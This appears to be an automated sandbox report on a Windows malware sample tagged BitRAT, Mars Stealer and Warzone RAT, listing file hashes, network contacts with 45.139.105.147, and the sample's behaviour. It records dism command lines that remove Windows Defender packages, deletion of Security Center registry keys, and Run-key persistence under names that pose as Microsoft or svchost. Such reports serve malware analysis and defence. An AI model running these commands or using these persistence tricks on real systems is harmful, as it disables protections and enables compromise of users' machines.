C:\Users\Admin\AppData\Local\Temp\62FB9DB2-9133-4809-94F1-C30E850FFA2C\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\62FB9DB2-9133-4809-94F1-C30E850FFA2C\dismhost.exe {0F561E13-71E2-411F-AC3A-C0E4A16C8794}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Users\Admin\AppData\Local\Temp\CEB8ED30-4469-43B8-845D-136C5A9ACA43\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\CEB8ED30-4469-43B8-845D-136C5A9ACA43\dismhost.exe {5681E6E7-62D7-4F59-8CA9-B048C8416A8E}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Users\Admin\AppData\Local\Temp\B9176574-69F7-430A-A225-5140D0BB8FF4\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\B9176574-69F7-430A-A225-5140D0BB8FF4\dismhost.exe {78FBFFFD-E195-4FF7-85F7-6AAB0BB570B0}
Network
| Country | Destination | Domain | Proto |
| N/A | 45.139.105.147:1234 | | tcp |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:1234 | | tcp |
| N/A | 45.139.105.147:5200 | | tcp |
| N/A | 45.139.105.147:1234 | | tcp |
| N/A | 45.139.105.147:5200 | | tcp |
| N/A | 45.139.105.147:1234 | | tcp |
| N/A | 45.139.105.147:5200 | | tcp |
| N/A | 45.139.105.147:5200 | | tcp |
Files
memory/980-54-0x00000000766D1000-0x00000000766D3000-memory.dmp
\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
memory/1552-59-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
memory/1352-66-0x0000000000000000-mapping.dmp
C:\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
C:\Users\Admin\AppData\Local\Temp\1BCB.tmp\1BCC.tmp\1BCD.bat
| MD5 | a9364ef8f38cb959002706b2cc5ca9b4 |
| SHA1 | 4fbfdd5dbab4c63cdae4876c16f09d0e2d83152a |
| SHA256 | 6eba0633df1319abc32f0a5e5464449b2648db207c7176d0e553dc9fe50f5b27 |
| SHA512 | a3496fc402264166470f9be89712eeff3f1ec7d8fde3d0bb4805d852dd6f4a426d5695895831faa53411d1d73fdcf24a8c6303a8898926f6af66a7589e32d4f3 |
C:\Users\Admin\AppData\Local\Temp\1BBC.tmp\1BBD.tmp\1BBE.bat
| MD5 | 3c92f725b696f48b1ae5386c6b88147d |
| SHA1 | 7d80fab21ff225acdefbe3c33e11d57dbd58244b |
| SHA256 | 50b7883ad90bcf0b20671b7f0de20d11e4dd88aa2d17cc36b0b0171ca9e800d2 |
| SHA512 | ceedc8835db458884cd49918981965610e2804e0dc42d2ae6eb3aa4c5c281b684978fa73a934faf513184a40fd6b8db8909e90ad86ee152cb63990a87f9c5d03 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismHost.exe
| MD5 | 9a821d8d62f4c60232b856e98cba7e4f |
| SHA1 | 4ec5dcbd43ad3b0178b26a57b8a2f41e33a48df5 |
| SHA256 | a5b3bf53bcd3c0296498383837e8f9eb7d610c535521315a96aa740cf769f525 |
| SHA512 | 1b5273a52973dac77ad0ef7aa1dda929a782d762ab8489eb90dff1062dd4cc01e4f7f4157266a2abcf8941e91cf4aa5603de1dd8ee871524748e0989ebaa37d3 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismCorePS.dll
| MD5 | 5488e381238ff19687fdd7ab2f44cfcc |
| SHA1 | b90fa27ef6a7fc6d543ba33d5c934180e17297d3 |
| SHA256 | abaada27d682b0d7270827c0271ac04505800b11d04b764562e4baa2cbc306a0 |
| SHA512 | 933e99749c68b3e9fe290fe4a1d8c90732ba13092d8cd9cac64f8e6583c8dcfbf25a4bea122966bc5d7d92e3a21210365a03b52274d25d704de52631e1fb0412 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\wdscore.dll
| MD5 | 7b38d7916a7cd058c16a0a6ca5077901 |
| SHA1 | f79d955a6eac2f0368c79f7ba8061e9c58ba99b2 |
| SHA256 | 3f6dd990e2da5d3bd6d65a72cbfb0fe79eb30b118a8ad71b6c9bb5581a622dce |
| SHA512 | 2d22fe535f464f635d42e5b016741b9caf173da372e4563a565fa1e294581f44330c61e08edfe4c08a341ebd708e2ad08614161c0ee54e8dea99452b87d1e710 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismprov.dll
| MD5 | 8ca117cb9338c0351236939717cb7084 |
| SHA1 | baa145810d50fdb204c8482fda5cacaaf58cdad0 |
| SHA256 | f351c3597c98ea9fe5271024fc2ccf895cc6a247fb3b02c1cdb68891dac29e54 |
| SHA512 | 35b4be68666d22f82d949ad9f0ce986779355e7d2d8fd99c0e2102cd364aba4a95b5805269261a9205c1130bdd1f5101d16146d9334c27796c7f41f2c3166c35 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\OSProvider.dll
| MD5 | e7caed467f80b29f4e63ba493614dbb1 |
| SHA1 | 65a159bcdb68c7514e4f5b65413678c673d2d0c9 |
| SHA256 | 2c325e2647eb622983948cc26c509c832e1094639bb7af0fb712583947ad019c |
| SHA512 | 34952d8a619eb46d8b7ec6463e1e99f1c641ce61c471997dd959911ae21d64e688d9aa8a78405faa49a652675caf40d8e9e5a07de30257f26da4c65f04e2181e |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\LogProvider.dll
| MD5 | 62de64dc805fd98af3ada9d93209f6a9 |
| SHA1 | 392ba504973d626aaf5c5b41b184670c58ec65a7 |
| SHA256 | 83c0f61cc8fc01c789c07dd25f58862e0710088e6887716b1be9ee9f149adefc |
| SHA512 | 7db48f240df566be9a4b836807f97e8169d58edfa699de69be35b3977e442da3fea4f8b38d359d50f4d5afcf8547c8f66329e5ec855efbc5402ce88458d67e28 |
C:\Windows\Logs\DISM\dism.log
| MD5 | da1e654bf23e9d993c1aa4d6c86b097e |
| SHA1 | 4aaa21de90b3466f175901734f295852d4162955 |
| SHA256 | a4b1f5d725de107e0b76be5579732c633629c63770d23a4f178ba7315f567020 |
| SHA512 | b053e434e76df2ef63a1519b495ddaf2f7e5b044ae788a809a3a121ca88c799304f53675773f52f8de93db008bf3a657196cbd37593b25bbb85fca4e5169e14b |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\CbsProvider.dll
| MD5 | efcb002abc3529d71b61e6fb6434566c |
| SHA1 | a25aca0fc9a1139f44329b28dc13c526965d311f |
| SHA256 | b641d944428f5b8ffb2fefd4da31c6a15ba84d01130f2712d7b1e71c518805bd |
| SHA512 | 10ee2b20f031ca5a131a9590599f13d3f0029352376705a2d7d2134fcd6535a3b54356d1b4d0b3fb53ac5ca4f034f9afb129a4f601159938680197ea39ea0687 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\CompatProvider.dll
| MD5 | 6a4bd682396f29fd7df5ab389509b950 |
| SHA1 | 46f502bec487bd6112f333d1ada1ec98a416d35f |
| SHA256 | 328e5fbb6f3088fd759d855e656cd4c477b59f6a43a247954d1fd9050815e6cb |
| SHA512 | 35ced350482c94d22c85cd1b98890d01baed0da1c35a114d2cd6373d08969be764282f7a9d8ff0dd1dff3fae42e4ea20d3194c352364901b23ca2f375bd02751 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\CompatProvider.dll.mui
| MD5 | 9085b83968e705a3be5cd7588545a955 |
| SHA1 | f0a477b353ca3e20fa65dd86cb260777ff27e1dd |
| SHA256 | fe0719cf624e08b5d6695ee3887358141d11316489c4ea97d2f61a4d2b9060cd |
| SHA512 | b7f12f7ac1e6942f24f4bf35444f623cc93f8a047ebc754b9599d5df16cab4d3745729d11b4a3abfdc06a671e55ac52cac937badd808825906f52885f16f2c1c |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\CbsProvider.dll.mui
| MD5 | 724ee7133b1822f7ff80891d773fde51 |
| SHA1 | d10dff002b02c78e624bf83ae8a6f25d73761827 |
| SHA256 | d13f068f42074b3104987bfed49fbf3a054be6093908ed5dea8901887dddb367 |
| SHA512 | 1dfd236537d6592a19b07b5e1624310c67adff9e776e6d2566b9e7db732588988f9ae7352df6c3b53c058807d8ed55fafc2004a2d6dc2f3f6c9e16445699f17b |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismCore.dll
| MD5 | f2b0771a7cd27f20689e0ab787b7eb7c |
| SHA1 | eb56e313cd23cb77524ef0db1309aebb0b36f7ef |
| SHA256 | 7c675710ae52d5e8344465f1179ec4e03c882d5e5b16fc0ba9564b1ea121638f |
| SHA512 | 5ebd4685e5b949d37c52bb1f2fe92accfa48dd4ef585c898f3982eb52f618064fc95c2f98532ca3e7007d0ef71c1fe91887ce3dc0a563f09bc2c5f59f3a3082a |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\dismprov.dll.mui
| MD5 | 9bc5d6eb3e2d31bbdbffe127a1b3cdbf |
| SHA1 | b253025c442aefe338b4c7ebea2f7d808abc9618 |
| SHA256 | 55e9ae098def76e7388d7d069746dbd136ae243357ece23b77f2365f0b2ff76f |
| SHA512 | f9968554737d181d4b7d0366f40f0c9a2039b59796986964413fa08f031f5529411b2741eb8ea3d8c312112b2038e6a58d891d090a42672c3d1c782b859f2e08 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DmiProvider.dll
| MD5 | fc2db5842190c6e78a40cd7da483b27c |
| SHA1 | e94ee17cd06fb55d04bef2bdfcf5736f336e0fa0 |
| SHA256 | e6c93305d886bff678bd83b715bb5c5cbb376b90b973d9dd6844fac808de5c82 |
| SHA512 | d5d32b894a485447d55499a2f1e02a8b33fb74081f225b8e2872995491a37353cf8022f46feeb3ca363b2e172ab89e29ab9a453692d1a964ca08d40230574bf6 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\FolderProvider.dll
| MD5 | c9d74156913061be6c51d8fc3acf8e93 |
| SHA1 | 4a4c6473a478256e4c78b423e918191118e01093 |
| SHA256 | af0a38b4e95a50427b215eebc185bb621187e066b8b7373fb960eac0551bec37 |
| SHA512 | c12f75a6451881878a7a9ed5de61d157ea36f53aa41abf7660e1cc411b2ddd70ff048a307b1440cfdf1b269aeff77da8cc163ad19e9e3a294a5128f170f37047 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\IntlProvider.dll
| MD5 | bbb9e4fa2561f6a6e5ccf25da069ac1b |
| SHA1 | 2d353ec70c7a13ac5749d2205ac732213505082a |
| SHA256 | b92cf901027901d7066e9ee7ac8f3b48a99cfb3a3ddd8d759cb77295148943c1 |
| SHA512 | 01f4e6d51a0acb394693191b78cefa28759903036636a1d64f90c60dc59c948c78dd38df6fb2be149245622eadf8b2627c6767bf2aa2e0e56e6b52f0b91cc79e |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\MsiProvider.dll
| MD5 | 45ff4fa5ca5432bfccded4433fe2a85b |
| SHA1 | 858c42499dd9d2198a6489dd310dc5cbff1e8d6e |
| SHA256 | 8a85869b2d61bad50d816daf08df080f8039dbeb1208009a73daa7be83d032bd |
| SHA512 | abbe0f673d18cc9a922cfd677e5b88714a3049ad8937f836b5a8b9bddac5ddbad4dc143360efc018dcd3a3440aa3e516b1a97f7cd2fa9a55cb73739dedef1589 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\LogProvider.dll.mui
| MD5 | f909216cf932aeb4f2f9f02e8c56a815 |
| SHA1 | c5cafe5f8dad60d3a1d7c75aa2cf575e35a634f2 |
| SHA256 | f5c89ba078697cdb705383684af49e07cdd094db962f0649cad23008ae9d6ce2 |
| SHA512 | 5dca19d54f738486085f11b5a2522073894a97d67e67be0eadbe9dc8944e632ae39b24499d7ff16e88d18166031697a238ead877f12cbb7447acca49c32a184a |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\IntlProvider.dll.mui
| MD5 | 0bffb5e4345198dbf18aa0bc8f0d6da1 |
| SHA1 | e2789081b7cf150b63bad62bac03b252283e9fe5 |
| SHA256 | b7bcc0e99719f24c30e12269e33a8bf09978c55593900d51d5f8588e51730739 |
| SHA512 | 590e8016075871846efff8b539e4779a1a628de318c161292c7231ca964a310e0722e44816041786c8620bff5c29ff34c5f35733ee4eac74f3abfae6d3af854a |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\FolderProvider.dll.mui
| MD5 | cab37f952682118bac4a3f824c80b6ac |
| SHA1 | 6e35b4289927e26e3c50c16cbf87eb3ac6f3b793 |
| SHA256 | 14bec7c4bb6cf1ee9049ef8820ec88bf78f2af75615f7a3fb265ef4b45c30e4d |
| SHA512 | de9089adaa85f37201526b8619f697be98a7d05353b21b6d835f4d56803732380316359ba8b3c8ca7c14a9bf7cf31a7eff3c866a8f303ef737eb63573e01aa19 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\DmiProvider.dll.mui
| MD5 | ee8c06cd11b34a37579d118ac5d6fa1d |
| SHA1 | c62f7fb0c6f42321b33ea675c0dfd304b2eb4a15 |
| SHA256 | 6991fb4bfd6800385a32ac759dd21016421cb13dca81f04ddcaf6bf12a928ccc |
| SHA512 | 091cfa7d9b80e92df13ba829372dfb211214f4221e52fbf3f558ebb7f18736ad9ad867ea0d0ddf8938def1b4db64a12d0df37c2eaf41727b997f4905dd41fed1 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\DismCore.dll.mui
| MD5 | f18044dec5b59c82c7f71ecffe2e89ab |
| SHA1 | 731d44676a8f5b3b7ad1d402dfdbb7f08bdc40c6 |
| SHA256 | a650578a4630e1a49280dc273d1d0bbdca81664a2199e5ab44ec7c5c54c0a35e |
| SHA512 | 53c23acddab099508b1e01dcc0d5dc9d4da67bc1765087f4a46b9ac842de065a55bac4c6682da07f5a1d29a3d0c1d92a4310e6b0f838740d919f8285911fa714 |
Analysis: behavioral4
Detonation Overview
Submitted
2023-01-03 19:42
Reported
2023-01-03 19:47
Platform
win10v2004-20221111-en
Max time kernel
151s
Max time network
155s
Command Line
Signatures
BitRAT
Mars Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security | C:\Windows\system32\reg.exe | N/A |
WarzoneRat, AveMaria
Warzone RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Program Files\InstallerX64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\PROGRA~1\INSTAL~2.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Program Files\installerX32.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe" | C:\Program Files\Microsoft.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost\ue000" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost瘀" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost됀" | C:\Program Files\Microsoft office.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File created | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\__tmp_rar_sfx_access_check_240547968 | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
